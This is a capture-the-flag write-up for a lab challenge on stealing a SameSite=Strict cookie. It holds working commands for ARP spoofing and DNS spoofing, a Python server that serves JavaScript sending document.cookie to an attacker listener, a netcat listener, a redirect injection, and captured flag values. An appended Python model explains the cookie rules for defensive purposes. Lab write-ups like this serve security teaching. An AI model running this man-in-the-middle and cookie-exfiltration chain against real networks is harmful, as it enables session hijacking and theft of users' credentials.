
Token 8: SameSite Strict Cookie

Token: PCCC{U_R_The_M0nk3y_M4st3r_75_97cS}

Objective

Steal the tokenStrict cookie from webvictim.pccc. The cookie belongs to domain external.target.pccc on port 80 and is marked SameSite: Strict.

Hosts

  • webvictim.pccc: 10.0.91.136
  • web.pccc: 10.0.91.135
  • Cookie domain: external.target.pccc

Understanding SameSite: Strict

  • Strict cookies are ONLY sent when the request originates from the same site
  • NOT sent on cross-site navigations, even top-level (clicking links from other sites)
  • To steal: the victim must already be ON external.target.pccc OR you need a same-site context

Method: Full Site Takeover via DNS

The key insight: if you control what external.target.pccc resolves to and what it serves, every request and every script running on that page is, from the browser's point of view, same-site.

Step 1: ARP spoof victim ↔ DNS server

arpspoof -i eth1 -t 10.0.91.136 10.0.91.133 &
arpspoof -i eth1 -t 10.0.91.133 10.0.91.136 &

Step 2: Spoof DNS for external.target.pccc

echo "10.0.91.138 external.target.pccc" > /tmp/dns.txt
dnsspoof -i eth1 -f /tmp/dns.txt

Step 3: Serve malicious page on external.target.pccc

Run a web server on port 80 that serves a page with JavaScript to exfiltrate cookies:

from http.server import HTTPServer, BaseHTTPRequestHandler

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        # The first hit arrives via a cross-site redirect from web.pccc, so the
        # Strict cookie is absent from this header; only Lax cookies show up here.
        cookie = self.headers.get('Cookie', 'none')
        print(f"[*] Cookie: {cookie}")

        # Serve page that exfiltrates cookie. document.cookie exposes every
        # non-HttpOnly cookie for the site, whatever its SameSite setting.
        html = '''<html>
<script>
// Cookie visible here because we ARE external.target.pccc
fetch('http://10.0.91.138:8888/?cookie=' + encodeURIComponent(document.cookie));
</script>
</html>'''
        self.send_response(200)
        self.send_header('Content-Type', 'text/html')
        self.end_headers()
        self.wfile.write(html.encode())

HTTPServer(('0.0.0.0', 80), Handler).serve_forever()

Step 4: Listen for exfiltrated data

nc -nlvp 8888

Step 5: Trigger navigation to external.target.pccc

Inject into web.pccc to redirect victim:

window.location = 'http://external.target.pccc/';

  1. Victim navigates to external.target.pccc (your IP due to DNS spoof)
  2. Browser is now ON external.target.pccc (same-site context)
  3. Your JavaScript reads document.cookie (Strict cookie now accessible)
  4. Exfiltrates to your listener

Captured:

tokenLax=PCCC{C00k13_B4nd1t_09_13qv}; tokenSecure=PCCC{U_R_The_M0nk3y_M4st3r_75_97cS}

Note: The Strict cookie may be named tokenSecure or tokenStrict in the actual cookie jar.

Why It Works

SameSite: Strict only restricts whether the browser attaches the cookie to a request, based on whether that request originates from the same site. By spoofing DNS:

  1. You become external.target.pccc
  2. When the victim loads your page, the browser considers it “same-site”
  3. JavaScript running in that context can access the Strict cookie
  4. You exfiltrate it to your server

Key Difference from Lax

  • Lax: Cookie sent on cross-site top-level navigation (just redirect and capture in headers)
  • Strict: Cookie NOT sent on cross-site navigation; must execute JavaScript in same-site context to access it
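The rules summarised in the two lists above, as an added example that is not part of the original writeup: a small model of which cookies reach the spoofed external.target.pccc page. The cookie jar is constructed; the hardened cookie (Secure + HttpOnly) is an assumption, included to show which attributes would have blocked the document.cookie read that this challenge relies on.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Cookie:
    name: str
    site: str          # host the cookie is scoped to
    samesite: str      # "Strict", "Lax" or "None"
    secure: bool = False
    httponly: bool = False

def sent_on_request(c, request_site, initiator_site, top_level_nav, method, https):
    """Would the browser attach cookie c to a request for request_site that was
    initiated from a page on initiator_site?  Models the SameSite rules only."""
    if c.site != request_site:
        return False                  # wrong host: never attached
    if c.secure and not https:
        return False                  # Secure cookies never travel over plain HTTP
    same_site = initiator_site == request_site
    if c.samesite == "Strict":
        return same_site
    if c.samesite == "Lax":
        return same_site or (top_level_nav and method == "GET")
    return True                       # SameSite=None

def readable_by_script(c, page_site, https):
    """Can document.cookie on a page served for page_site read cookie c?
    SameSite plays no part here; HttpOnly and Secure do."""
    return c.site == page_site and not c.httponly and (https or not c.secure)

VICTIM_SITE = "external.target.pccc"
# Constructed cookie jar: the two cookies named in the writeup plus a hardened
# variant (assumed, not from the challenge) to show what would block the read.
JAR = [
    Cookie("tokenLax", VICTIM_SITE, "Lax"),
    Cookie("tokenStrict", VICTIM_SITE, "Strict"),
    Cookie("hardened", VICTIM_SITE, "Strict", secure=True, httponly=True),
]

def spoofed_page_outcome(c):
    """Replay the writeup: a redirect from web.pccc to the DNS-spoofed
    external.target.pccc (plain HTTP, port 80), then document.cookie on that page."""
    on_redirect = sent_on_request(c, VICTIM_SITE, "web.pccc",
                                  top_level_nav=True, method="GET", https=False)
    via_script = readable_by_script(c, VICTIM_SITE, https=False)
    return {"sent_on_redirect": on_redirect, "read_by_script": via_script}

if __name__ == "__main__":
    for c in JAR:
        print(c.name, spoofed_page_outcome(c))
```

Running it shows tokenLax arriving in the very first request, tokenStrict arriving only through document.cookie, and the hardened cookie reaching neither the plaintext request nor the script.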

Cleanup

pkill arpspoof
pkill dnsspoof